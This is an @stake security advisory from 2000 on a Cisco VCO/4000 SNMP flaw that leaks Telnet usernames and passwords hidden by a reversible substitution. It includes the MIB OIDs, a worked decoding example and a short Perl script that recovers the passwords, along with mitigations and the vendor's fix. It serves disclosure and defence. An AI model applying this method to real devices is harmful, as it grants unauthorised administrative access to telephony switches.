-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 @stake, Inc. www.atstake.com Security Advisory Advisory Name: Cisco VCO/4000 SNMP Username and Password Retrieval Release Date: 10/26/2000 Application: N/A Platform: Cisco (Formerly Summa Four) VCO/4K software version 5.1.3 and below Severity: An attacker can obtain login and password credentials to the administrative interfaces with the read-only community string. Author(s): David Goldsmith Brian Carrier Rex Warren Vendor Status: Software upgrade available Web: www.atstake.com/research/advisories/2000/A102600-1.txt Overview: This advisory describes a vulnerability that exists in Cisco Systems' Virtual Central Office 4000 (VCO/4K). The VCO/4K is a programmable switch that provides numerous telephony capabilities including voice services, switching for wireless and wireline networks, and circuit/packet-switched network gateway services. The VCO/4K can be administered via several TCP/IP interfaces, including Telnet and SNMP. There is a vulnerability in the SNMP interface that allows an attacker to enumerate username and obfuscated password pairs for the Telnet interface. Since the obfuscation method used on the passwords is reversible, administrative access to the VCO/4K can be obtained. Detailed Description: If an attacker knows the read-only community string of a VCO/4K, then they can obtain a list of users and their obfuscated passwords. The obfuscation can be easily reversed, allowing an attacker to obtain additional privileges on the VCO/4K. The SNMP MIB of the VCO/4K contains, among other data, a list of usernames and passwords. These entries start at: [ ... ] enterprises.886.1.1.1.1.2.1 = "someuser" enterprises.886.1.1.1.1.3.1 = 0 enterprises.886.1.1.1.1.4.1 = ".At4Cqq" enterprises.886.1.1.1.1.5.1 = 0 [ ... ] The enterprises.886.1.1.1.1.2.1 entry is the first username, with enterprises.886.1.1.1.1.4.1 being the corresponding (albeit obfuscated) password. The password obfuscation algorithm is a substitution cipher that replaces each ASCII character by one that is 164 places away. For historical reasons, we will call this ROT164(): ROT164(X) = 164 - X Using the example above: ROT164(".") = 164 - 046 = 118 => "v" ROT164("A") = 164 - 065 = 099 => "c" ROT164("t") = 164 - 116 = 048 => "0" ROT164("4") = 164 - 052 = 112 => "p" ROT164("C") = 164 - 067 = 097 => "a" ROT164("q") = 164 - 113 = 051 => "3" ROT164("q") = 164 - 113 = 051 => "3" Temporary Solution: If SNMP is not required on the VCO/4K, then disable the service. If it is required, then verify that the community string is difficult to guess and that access to it is restricted. Vendor Response: Cisco Systems is aware of the vulnerability reported by @stake and has prepared two software releases to address the problem. In Cisco VCO/4K software version 5.1.4, the display of the usernames and encrypted passwords has been removed from SNMP responses. Version 5.2, to be released in early December, also includes enhancements replacing the weak password encryption with MD5 -- similar to Type 5 passwords in Cisco IOS -- as well as general improvements to access control. The Cisco PSIRT appreciates the efforts made by @stake in communicating this vulnerability to us and working with us to resolve it. Proof-of-Concept Code: The decryption code was written in PERL by Rex Warren. Due to the cyclic properties of ROT164, the program accepts both the plaintext and the obfuscated password as standard input and returns the opposite version. <--- cut here ---> #!/usr/bin/perl printf ("Cisco VCO/4K Password [De]Obfuscator\n"); printf ("\t\@stake, Inc.\n"); printf ("\tRex Warren, Brian Carrier, David Goldsmith\n"); printf ("Enter Password: "); $pw = ; chop $pw; printf("Result: "); for ($pos = 0; $pos < length($pw); $pos++){ printf("%s", chr(164 - ord(substr($pw, $pos, 1)))); } printf("\n"); <--- cut here ---> For more advisories: http://www.atstake.com/advisories/ PGP Key: http://www.atstake.com/research/pgp_key.asc Copyright 2000 @stake, Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: PGP 7.0 iQA/AwUBOfim6FESXwDtLdMhEQJNBQCg/+qtlAhZhBTkyS0NM79IgslLstkAmgJ1 QJWVuPg3wpwnN+3NBLCm7kpJ =KyIB -----END PGP SIGNATURE-----